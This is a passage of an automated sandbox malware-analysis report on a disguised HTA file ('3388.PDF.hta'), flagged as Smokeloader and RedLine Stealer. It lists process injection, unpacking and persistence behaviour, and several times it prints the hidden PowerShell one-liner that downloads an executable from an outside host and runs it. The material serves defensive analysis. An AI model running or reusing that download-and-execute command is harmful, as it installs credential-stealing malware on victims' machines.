    Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
    Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

    System Summary

    barindex
    Source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000004.00000002.406664461.0000000000669000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000008.00000002.472086421.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000004.00000002.406577078.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000008.00000002.476562400.0000000000999000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\EkXH.exeJump to dropped file
    Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401529
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00402FFA RtlCreateUserThread,NtTerminateProcess,4_2_00402FFA
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401541
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401545
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401553
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00402379 NtQuerySystemInformation,4_2_00402379
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_0040237B NtQuerySystemInformation,4_2_0040237B
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_0040332A GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQueryInformationProcess,NtQueryKey,RtlCreateUserThread,wcsstr,4_2_0040332A
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401534
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014DB
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_004020EA NtQuerySystemInformation,4_2_004020EA
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00402387 NtQuerySystemInformation,4_2_00402387
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00402397 NtQuerySystemInformation,4_2_00402397
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_0040239B NtQuerySystemInformation,4_2_0040239B
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_0040239E NtQuerySystemInformation,4_2_0040239E
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401529
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00402FFA RtlCreateUserThread,NtTerminateProcess,8_2_00402FFA
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401541
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401545
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401553
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00402379 NtQuerySystemInformation,8_2_00402379
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_0040237B NtQuerySystemInformation,8_2_0040237B
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_0040332A GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQueryInformationProcess,NtQueryKey,RtlCreateUserThread,wcsstr,towlower,8_2_0040332A
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401534
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004014DB
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_004020EA NtQuerySystemInformation,8_2_004020EA
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00402387 NtQuerySystemInformation,8_2_00402387
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00402397 NtQuerySystemInformation,8_2_00402397
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_0040239B NtQuerySystemInformation,8_2_0040239B
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_0040239E NtQuerySystemInformation,8_2_0040239E
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00418A704_2_00418A70
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00418A708_2_00418A70
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
    Source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000004.00000002.406664461.0000000000669000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000008.00000002.472086421.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000004.00000002.406577078.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000008.00000002.476562400.0000000000999000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: EkXH.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: vgjfftu.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winHTA@8/6@24/1
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_0066C317 CreateToolhelp32Snapshot,Module32First,4_2_0066C317
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\3whyeuor.ju0.ps1Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\3388.PDF.hta"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\EkXH.exe "C:\Users\user\AppData\Local\Temp\EkXH.exe"
    Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {A18241FA-0367-40E9-BBC3-15CE4DAD052A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\vgjfftu C:\Users\user\AppData\Roaming\vgjfftu
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\EkXH.exe "C:\Users\user\AppData\Local\Temp\EkXH.exe" Jump to behavior
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\vgjfftu C:\Users\user\AppData\Roaming\vgjfftuJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuSection loaded: wow64win.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\vgjfftuSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: 3388.PDF.htaStatic file information: File size 4178844 > 1048576
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeUnpacked PE file: 4.2.EkXH.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\vgjfftuUnpacked PE file: 8.2.vgjfftu.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_0040237B push 000023C2h; retn 0023h4_2_0040238B
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_004025DC push ebp; ret 4_2_004025FC
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00401284 pushad ; iretd 4_2_00401286
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00222643 push ebp; ret 4_2_00222663
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_002223E2 push 000023C2h; retn 0023h4_2_002223F2
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_002212EB pushad ; iretd 4_2_002212ED
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_0066EB61 push es; retf 4_2_0066EB78
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00673874 push esp; ret 4_2_00673875
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_0066D03C pushad ; iretd 4_2_0066D03E
    Source: C:\Users\user\AppData\Local\Temp\EkXH.exeCode function: 4_2_00670291 push ebx; ret 4_2_00670294
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_0040237B push 000023C2h; retn 0023h8_2_0040238B
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_004025DC push ebp; ret 8_2_004025FC
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00401284 pushad ; iretd 8_2_00401286
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_00222643 push ebp; ret 8_2_00222663
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_002223E2 push 000023C2h; retn 0023h8_2_002223F2
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_002212EB pushad ; iretd 8_2_002212ED
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_0099CC1C pushad ; iretd 8_2_0099CC1E
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_009A3454 push esp; ret 8_2_009A3455
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_0099E741 push es; retf 8_2_0099E758
    Source: C:\Users\user\AppData\Roaming\vgjfftuCode function: 8_2_0099FE71 push ebx; ret 8_2_0099FE74
    Source: EkXH.exe.1.drStatic PE information: section name: .text entropy: 7.486630625699931
    Source: vgjfftu.5.drStatic PE information: section name: .text entropy: 7.486630625699931

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"Jump to behavior
